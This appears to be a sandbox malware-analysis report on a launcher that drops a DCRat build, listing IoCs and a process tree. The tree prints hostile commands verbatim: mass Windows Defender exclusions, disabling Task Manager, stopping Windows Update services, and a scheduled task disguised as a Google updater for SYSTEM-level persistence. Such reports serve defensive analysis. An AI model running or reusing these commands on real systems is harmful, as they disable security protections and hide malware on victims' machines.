4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	4920	dialer.exe
Token: SeShutdownPrivilege	1576	powercfg.exe
Token: SeCreatePagefilePrivilege	1576	powercfg.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeShutdownPrivilege	2388	powercfg.exe
Token: SeCreatePagefilePrivilege	2388	powercfg.exe
Token: SeShutdownPrivilege	4924	powercfg.exe
Token: SeCreatePagefilePrivilege	4924	powercfg.exe
Token: SeShutdownPrivilege	1276	powercfg.exe
Token: SeCreatePagefilePrivilege	1276	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1764	powershell.exe
Token: SeSecurityPrivilege	1764	powershell.exe
Token: SeTakeOwnershipPrivilege	1764	powershell.exe
Token: SeLoadDriverPrivilege	1764	powershell.exe
Token: SeSystemProfilePrivilege	1764	powershell.exe
Token: SeSystemtimePrivilege	1764	powershell.exe
Token: SeProfSingleProcessPrivilege	1764	powershell.exe
Token: SeIncBasePriorityPrivilege	1764	powershell.exe
Token: SeCreatePagefilePrivilege	1764	powershell.exe
Token: SeBackupPrivilege	1764	powershell.exe
Token: SeRestorePrivilege	1764	powershell.exe
Token: SeShutdownPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeSystemEnvironmentPrivilege	1764	powershell.exe
Token: SeRemoteShutdownPrivilege	1764	powershell.exe
Token: SeUndockPrivilege	1764	powershell.exe
Token: SeManageVolumePrivilege	1764	powershell.exe
Token: 33	1764	powershell.exe
Token: 34	1764	powershell.exe
Token: 35	1764	powershell.exe
Token: 36	1764	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2204	svchost.exe
Token: SeIncreaseQuotaPrivilege	2204	svchost.exe
Token: SeSecurityPrivilege	2204	svchost.exe
Token: SeTakeOwnershipPrivilege	2204	svchost.exe
Token: SeLoadDriverPrivilege	2204	svchost.exe
Token: SeSystemtimePrivilege	2204	svchost.exe
Token: SeBackupPrivilege	2204	svchost.exe
Token: SeRestorePrivilege	2204	svchost.exe
Token: SeShutdownPrivilege	2204	svchost.exe
Token: SeSystemEnvironmentPrivilege	2204	svchost.exe
Token: SeUndockPrivilege	2204	svchost.exe
Token: SeManageVolumePrivilege	2204	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2204	svchost.exe
Token: SeIncreaseQuotaPrivilege	2204	svchost.exe
Token: SeSecurityPrivilege	2204	svchost.exe
Token: SeTakeOwnershipPrivilege	2204	svchost.exe
Token: SeLoadDriverPrivilege	2204	svchost.exe
Token: SeSystemtimePrivilege	2204	svchost.exe
Token: SeBackupPrivilege	2204	svchost.exe
Token: SeRestorePrivilege	2204	svchost.exe
Token: SeShutdownPrivilege	2204	svchost.exe
Token: SeSystemEnvironmentPrivilege	2204	svchost.exe
Token: SeUndockPrivilege	2204	svchost.exe
Token: SeManageVolumePrivilege	2204	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2204	svchost.exe
Token: SeIncreaseQuotaPrivilege	2204	svchost.exe
Token: SeSecurityPrivilege	2204	svchost.exe
Token: SeTakeOwnershipPrivilege	2204	svchost.exe
Token: SeLoadDriverPrivilege	2204	svchost.exe
Token: SeSystemtimePrivilege	2204	svchost.exe
Token: SeBackupPrivilege	2204	svchost.exe
Token: SeRestorePrivilege	2204	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3988	Conhost.exe
3324	Conhost.exe
5508	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4880 wrote to memory of 436	4880	launcher.exe.bin.exe	82
PID 4880 wrote to memory of 436	4880	launcher.exe.bin.exe	82
PID 4880 wrote to memory of 4288	4880	launcher.exe.bin.exe	83
PID 4880 wrote to memory of 4288	4880	launcher.exe.bin.exe	83
PID 4880 wrote to memory of 4288	4880	launcher.exe.bin.exe	83
PID 4880 wrote to memory of 1048	4880	launcher.exe.bin.exe	84
PID 4880 wrote to memory of 1048	4880	launcher.exe.bin.exe	84
PID 1048 wrote to memory of 5016	1048	launcher.exe	86
PID 1048 wrote to memory of 5016	1048	launcher.exe	86
PID 4288 wrote to memory of 4316	4288	DCRatBuild.exe	87
PID 4288 wrote to memory of 4316	4288	DCRatBuild.exe	87
PID 4288 wrote to memory of 4316	4288	DCRatBuild.exe	87
PID 532 wrote to memory of 4124	532	cmd.exe	96
PID 532 wrote to memory of 4124	532	cmd.exe	96
PID 532 wrote to memory of 3476	532	cmd.exe	97
PID 532 wrote to memory of 3476	532	cmd.exe	97
PID 532 wrote to memory of 1472	532	cmd.exe	98
PID 532 wrote to memory of 1472	532	cmd.exe	98
PID 532 wrote to memory of 1128	532	cmd.exe	99
PID 532 wrote to memory of 1128	532	cmd.exe	99
PID 532 wrote to memory of 2496	532	cmd.exe	100
PID 532 wrote to memory of 2496	532	cmd.exe	100
PID 436 wrote to memory of 4920	436	hs.exe	103
PID 1872 wrote to memory of 1576	1872	cmd.exe	106
PID 1872 wrote to memory of 1576	1872	cmd.exe	106
PID 4920 wrote to memory of 616	4920	dialer.exe	5
PID 4920 wrote to memory of 676	4920	dialer.exe	7
PID 4920 wrote to memory of 960	4920	dialer.exe	12
PID 4920 wrote to memory of 336	4920	dialer.exe	13
PID 4920 wrote to memory of 468	4920	dialer.exe	14
PID 4920 wrote to memory of 1004	4920	dialer.exe	15
PID 4920 wrote to memory of 1032	4920	dialer.exe	16
PID 1872 wrote to memory of 2388	1872	cmd.exe	107
PID 1872 wrote to memory of 2388	1872	cmd.exe	107
PID 4920 wrote to memory of 1132	4920	dialer.exe	18
PID 676 wrote to memory of 2772	676	lsass.exe	48
PID 4920 wrote to memory of 1188	4920	dialer.exe	19
PID 4920 wrote to memory of 1196	4920	dialer.exe	20
PID 4920 wrote to memory of 1280	4920	dialer.exe	21
PID 4920 wrote to memory of 1320	4920	dialer.exe	22
PID 4920 wrote to memory of 1356	4920	dialer.exe	23
PID 4920 wrote to memory of 1452	4920	dialer.exe	24
PID 4920 wrote to memory of 1460	4920	dialer.exe	25
PID 4920 wrote to memory of 1528	4920	dialer.exe	26
PID 4920 wrote to memory of 1548	4920	dialer.exe	27
PID 4920 wrote to memory of 1680	4920	dialer.exe	28
PID 4920 wrote to memory of 1696	4920	dialer.exe	29
PID 4920 wrote to memory of 1748	4920	dialer.exe	30
PID 4920 wrote to memory of 1780	4920	dialer.exe	31
PID 4920 wrote to memory of 1832	4920	dialer.exe	32
PID 4920 wrote to memory of 1880	4920	dialer.exe	33
PID 4920 wrote to memory of 1892	4920	dialer.exe	34
PID 4920 wrote to memory of 2008	4920	dialer.exe	35
PID 4920 wrote to memory of 1664	4920	dialer.exe	36
PID 4920 wrote to memory of 2060	4920	dialer.exe	37
PID 4920 wrote to memory of 2168	4920	dialer.exe	39
PID 4920 wrote to memory of 2204	4920	dialer.exe	40
PID 4920 wrote to memory of 2244	4920	dialer.exe	41
PID 4920 wrote to memory of 2440	4920	dialer.exe	42
PID 4920 wrote to memory of 2448	4920	dialer.exe	43
PID 4920 wrote to memory of 2596	4920	dialer.exe	44
PID 4920 wrote to memory of 2624	4920	dialer.exe	45
PID 4920 wrote to memory of 2692	4920	dialer.exe	46
PID 4920 wrote to memory of 2732	4920	dialer.exe	47

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:336

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1188
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2848
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1460
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1664

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2732

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2744

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3444

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3532
- C:\Users\Admin\AppData\Local\Temp\launcher.exe.bin.exe
  "C:\Users\Admin\AppData\Local\Temp\launcher.exe.bin.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Users\Admin\AppData\Local\Temp\hs.exe
    "C:\Users\Admin\AppData\Local\Temp\hs.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:436
- - C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
    "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:4316
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\OHRUZlNyrkuiImPm8IL2cpmlknwyRgjXew4XDjDWHSF.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3252
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3988
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:540
      - C:\fontdriversavescrt\ComComponentDriverInto.exe
        
        "C:\fontdriversavescrt/ComComponentDriverInto.exe"
        6⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Modifies registry class
        
        PID:4152
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q4e4ntzq\q4e4ntzq.cmdline"
        7⤵
        Drops file in System32 directory
        
        PID:2344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3324
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D35.tmp" "c:\Windows\System32\CSCCCAA06A3ED9442AAA71A8CCAD71A8499.TMP"
        8⤵
        
        PID:3084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:628
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:696
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3324 -s 368
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2832
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4820" "2172" "2096" "2176" "0" "0" "2180" "0" "0" "0" "0" "0"
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2284
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\wininit.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4700
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:8
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4380
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\ja-JP\launcher.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\browser\features\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5024
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mMtIUGtOdl.bat"
        7⤵
        
        PID:5424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5508
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5832
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:400
        
        C:\Recovery\WindowsRE\wininit.exe
        
        "C:\Recovery\WindowsRE\wininit.exe"
        8⤵
        Executes dropped EXE
        
        PID:2636
- - C:\Users\Admin\AppData\Local\Temp\launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c pause
      4⤵
      PID:5016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4124
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3476
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1472
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1128
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2496
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3408
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4924
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2000
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:232
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3896
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4244
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:312
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4084
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3112
- - C:\Windows\System32\sc.exe
